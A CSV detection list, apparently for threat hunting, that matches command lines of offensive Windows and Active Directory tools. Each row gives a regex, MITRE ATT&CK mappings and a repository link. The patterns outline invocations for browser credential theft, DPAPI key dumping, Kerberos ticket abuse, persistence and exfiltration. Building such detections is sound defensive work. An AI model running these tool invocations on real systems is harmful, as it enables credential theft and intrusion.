"*.exe /gethmac /mode:SHA1 /key:*",".{0,1000}\.exe\s\/gethmac\s\/mode\:SHA1\s\/key\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","4333"
"*.exe /HistorySource 1 /LoadChrome 1 /shtml *",".{0,1000}\.exe\s\/HistorySource\s1\s\/LoadChrome\s1\s\/shtml\s.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4335"
"*.exe /method:create /taskname:*",".{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","4340"
"*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*",".{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}\s\/trigger\:.{0,1000}\s\/modifier\:.{0,1000}\s\/program\:.{0,1000}\s\/argument\:.{0,1000}\.dll\s\/remoteserver\:.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","4341"
"*.exe /method:delete /taskname:* /technique:hide*",".{0,1000}\.exe\s\/method\:delete\s\/taskname\:.{0,1000}\s\/technique\:hide.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","4342"
"*.exe /method:edit /taskname:Cleanup*",".{0,1000}\.exe\s\/method\:edit\s\/taskname\:Cleanup.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","4343"
"*.exe 3 cmd*",".{0,1000}\.exe\s3\scmd.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","4349"
"*.exe acl -dn * -scope * -trustee *",".{0,1000}\.exe\sacl\s\-dn\s.{0,1000}\s\-scope\s.{0,1000}\s\-trustee\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4350"
"*.exe --ACLScan * --OU *",".{0,1000}\.exe\s\-\-ACLScan\s.{0,1000}\s\-\-OU\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","4351"
"*.exe --Action GetGPLink --*",".{0,1000}\.exe\s\-\-Action\sGetGPLink\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4352"
"*.exe --Action GetGPLink --*",".{0,1000}\.exe\s\-\-Action\sGetGPLink\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4353"
"*.exe --Action GetGPO --*",".{0,1000}\.exe\s\-\-Action\sGetGPO\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4354"
"*.exe --Action GetGPO --*",".{0,1000}\.exe\s\-\-Action\sGetGPO\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4355"
"*.exe --Action MoveObject --*",".{0,1000}\.exe\s\-\-Action\sMoveObject\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4356"
"*.exe --Action MoveObject --*",".{0,1000}\.exe\s\-\-Action\sMoveObject\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4357"
"*.exe --Action NewGPLink --DN *",".{0,1000}\.exe\s\-\-Action\sNewGPLink\s\-\-DN\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4358"
"*.exe --Action NewGPLink --DN *",".{0,1000}\.exe\s\-\-Action\sNewGPLink\s\-\-DN\s.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4359"
"*.exe --Action RemoveGPLink --DN *",".{0,1000}\.exe\s\-\-Action\sRemoveGPLink\s\-\-DN\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4360"
"*.exe --Action RemoveGPLink --DN *",".{0,1000}\.exe\s\-\-Action\sRemoveGPLink\s\-\-DN\s.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4361"
"*.exe --Action RemoveGPO --*",".{0,1000}\.exe\s\-\-Action\sRemoveGPO\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4362"
"*.exe --Action RemoveGPO --*",".{0,1000}\.exe\s\-\-Action\sRemoveGPO\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4363"
"*.exe --Action RemoveOU --*",".{0,1000}\.exe\s\-\-Action\sRemoveOU\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4364"
"*.exe --Action RemoveOU --*",".{0,1000}\.exe\s\-\-Action\sRemoveOU\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4365"
"*.exe action=create * service=* displayname=* binpath=**",".{0,1000}\.exe\saction\=create\s.{0,1000}\sservice\=.{0,1000}\sdisplayname\=.{0,1000}\sbinpath\=.{0,1000}.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","4366"
"*.exe action=dcom computername=* command=* throw=wmi *",".{0,1000}\.exe\saction\=dcom\scomputername\=.{0,1000}\scommand\=.{0,1000}\sthrow\=wmi\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4367"
"*.exe action=dcom computername=* command=* throw=wmi *",".{0,1000}\.exe\saction\=dcom\scomputername\=.{0,1000}\scommand\=.{0,1000}\sthrow\=wmi\s.{0,1000}","offensive_tool_keyword","SharpMove","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4368"
"*.exe action=executevbs computername=*",".{0,1000}\.exe\saction\=executevbs\scomputername\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","4369"
"*.exe action=GetScheduledTaskCOMHandler*",".{0,1000}\.exe\saction\=GetScheduledTaskCOMHandler.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","4370"
"*.exe action=ListRunningServices*",".{0,1000}\.exe\saction\=ListRunningServices.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","4371"
"*.exe action=ListScheduledTasks*",".{0,1000}\.exe\saction\=ListScheduledTasks.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","4372"
"*.exe action=ListTaskNames*",".{0,1000}\.exe\saction\=ListTaskNames.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","4373"
"*.exe --adcs * --remote *",".{0,1000}\.exe\s\-\-adcs\s.{0,1000}\s\-\-remote\s.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","4374"
"*.exe AlwaysInstallElevated*",".{0,1000}\.exe\sAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4375"
"*.exe app /create /name:* /uncpath:*\\*",".{0,1000}\.exe\sapp\s\/create\s\/name\:.{0,1000}\s\/uncpath\:.{0,1000}\\\\.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","4376"
"*.exe app /deploy /name:* /groupname:* /assignmentname:*",".{0,1000}\.exe\sapp\s\/deploy\s\/name\:.{0,1000}\s\/groupname\:.{0,1000}\s\/assignmentname\:.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","4377"
"*.exe asktgs /ticket:B64_TGT /service:*",".{0,1000}\.exe\sasktgs\s\/ticket\:B64_TGT\s\/service\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","4378"
"*.exe asktgs*",".{0,1000}\.exe\sasktgs.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","4379"
"*.exe asktgt /user:* /aes256:* /opsec /ptt*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/aes256\:.{0,1000}\s\/opsec\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus  More stealthy variant but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4380"
"*.exe asktgt /user:* /certificate:* /password:*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/certificate\:.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","4381"
"*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/rc4\:.{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. steal the token from this process (requires elevation)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4382"
"*.exe asktgt /user:* /rc4:* /ptt*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/rc4\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus  Request a TGT as the target user and pass it into the current session","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4383"
"*.exe --asrep",".{0,1000}\.exe\s\-\-asrep","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","4384"
"*.exe asreproast /*",".{0,1000}\.exe\sasreproast\s\/.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","4385"
"*.exe audit HijackablePaths*",".{0,1000}\.exe\saudit\sHijackablePaths.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4386"
"*.exe audit HijackablePaths*",".{0,1000}\.exe\saudit\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4387"
"*.exe audit ModifiableServices*",".{0,1000}\.exe\saudit\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4388"
"*.exe AzureStorage --connectionstring * --filepath * --extensions *",".{0,1000}\.exe\sAzureStorage\s\-\-connectionstring\s.{0,1000}\s\-\-filepath\s.{0,1000}\s\-\-extensions\s.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","4389"
"*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*",".{0,1000}\.exe\s\-b\s.{0,1000}\s\-p\s\'C\:\\Users\\User\\AppData\\Local\\Microsoft\\Edge\\User\sData\\Default\'.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","4390"
"*.exe -b all -f json --dir results -cc*",".{0,1000}\.exe\s\-b\sall\s\-f\sjson\s\-\-dir\sresults\s\-cc.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","4391"
"*.exe -b chromium -p *\AppData\Local\Google\Chrome\*",".{0,1000}\.exe\s\-b\schromium\s\-p\s.{0,1000}\\AppData\\Local\\Google\\Chrome\\.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","4392"
"*.exe backupkey /nowrap *.pvk*",".{0,1000}\.exe\sbackupkey\s\/nowrap\s.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4393"
"*.exe backupkey /server:*",".{0,1000}\.exe\sbackupkey\s\/server\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4394"
